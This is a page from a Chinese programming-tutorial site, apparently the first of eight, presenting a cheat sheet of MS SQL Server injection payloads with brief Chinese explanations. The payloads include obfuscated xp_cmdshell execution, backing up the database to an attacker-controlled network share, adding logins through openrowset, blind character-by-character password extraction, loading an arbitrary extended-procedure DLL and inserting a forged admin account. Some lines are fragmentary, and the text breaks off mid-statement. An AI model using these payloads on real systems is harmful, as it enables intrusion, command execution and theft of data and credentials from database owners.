当前位置: 网学 > 编程文档 > SQL SERVER > 正文

非常经典的Ms Sql注射资料

来源:Http://myeducs.cn 联系QQ:点击这里给我发消息 作者: 用户投稿 来源: 网络 发布时间: 12/10/18
下载{$ArticleTitle}原创论文样式
;

declare @a sysname set @a=''xp_''+''cmdshell'' exec @a ''dir c:\'' 
declare @a sysname set @a=''xp''+''_cm''+''dshell'' exec @a ''dir c:\''
;declare @a;set @a=db_name();backup database @a to disk=''你的IP你的共享目录bak.dat'' 
如果被限制则可以。
select * from openrowset(''sqloledb'',''server'';''sa'';'''',''select ''''OK!'''' exec master.dbo.sp_addlogin hax'')
传统查询构造:
select * FROM news where id= AND topic= AND ..
admin''and 1=(select count(*) from [user] where username=''victim'' and right(left(userpass,01),1)=''1'') and userpass <>''
select 123;--
;use master;--
:a'' or name like ''fff%'';-- 显示有一个叫ffff的用户哈。
''and 1<>(select count(email) from [user]);--
;update [users] set email=(select top 1 name from sysobjects where xtype=''u'' and status>0) where name=''ffff'';--
说明:
上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。
通过查看ffff的用户资料可得第一个用表叫ad
然后根据表名ad得到这个表的ID
ffff'';update [users] set email=(select top 1 id from sysobjects where xtype=''u'' and name=''ad'') where name=''ffff'';--

象下面这样就可以得到第二个表的名字了
ffff'';update [users] set email=(select top 1 name from sysobjects where xtype=''u'' and id>581577110) where name=''ffff'';--
ffff'';update [users] set email=(select top 1 count(id) from password) where name=''ffff'';--
ffff'';update [users] set email=(select top 1 pwd from password where id=2) where name=''ffff'';--

ffff'';update [users] set email=(select top 1 name from password where id=2) where name=''ffff'';--

exec master..xp_servicecontrol ''start'', ''schedule'' 
exec master..xp_servicecontrol ''start'', ''server''
sp_addextendedproc ''xp_webserver'', ''c:\temp\xp_foo.dll'' 
扩展存储就可以通过一般的方法调用: 
exec xp_webserver 
一旦这个扩展存储执行过,可以这样删除它: 
sp_dropextendedproc ''xp_webserver'' 

insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)-

insert into users values( 667,123,123,0xffff)-

insert into users values ( 123, ''admin''''--'', ''password'', 0xffff)-

;and user>0
;;and (select count
上一页12345678下一页
点击进入论坛和大家一起交流设计,分享设计素材,结交设计朋友
  • 上一篇资讯: MS SQL Server的一点学习记录
  • 下一篇资讯: 数据库学习笔录

    • 相关资讯

    网学推荐

    免费论文

    原创论文

    文章排行榜

  • · SQL Server死锁的分析
  • · SQL Server死锁产生原因及解决办法
  • · 使用SQL Server 2000索引视图提高性
  • · 在SQL Server中使用索引视图查看性
  • · 维护SQL Server数据库的一些常用SQ
  • · MS SQL视图使用详解
  • · SQL Server 的通用分页显示存储过程
  • · SQL Server中利用存储过程来高性能
  • · 谈基于SQL SERVER分页存储过程的演
  • · Sql Server2005用Row_Number分页存
  • · Windows 7中同步中心关闭SQL Serve
  • · MSSQL Server和MySQL区别
  • · Windows7中SQL 2000企业管理器新建
  • · Windows VISTA/2008/7安装了SQL 20
  • · 从Sql server获取表字段属性信息,
  • · 用SQL附加数据库的语句
  • · 数据库导出Excel
  • · SQL Server实现数字转字符保留几位
    • 浏览:
    设为首页 | 加入收藏 | 论文首页 | 论文专题 | 设计下载 | 网学软件 | 论文模板 | 论文资源 | 程序设计 | 关于网学 | 站内搜索 | 网学留言 | 友情链接 | 资料中心
    版权所有 QQ:3710167 邮箱:3710167@qq.com 网学网 [Myeducs.cn] 您电脑的分辨率是 像素
    Copyright 2008-2015 myeducs.Cn www.myeducs.Cn All Rights Reserved
    湘ICP备09003080号